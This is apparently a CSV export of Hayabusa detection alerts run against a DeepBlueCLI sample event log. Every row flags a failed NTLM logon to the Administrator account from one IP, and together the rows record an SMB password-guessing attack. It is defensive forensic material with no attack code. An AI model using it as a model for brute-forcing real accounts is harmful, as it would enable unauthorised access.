2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
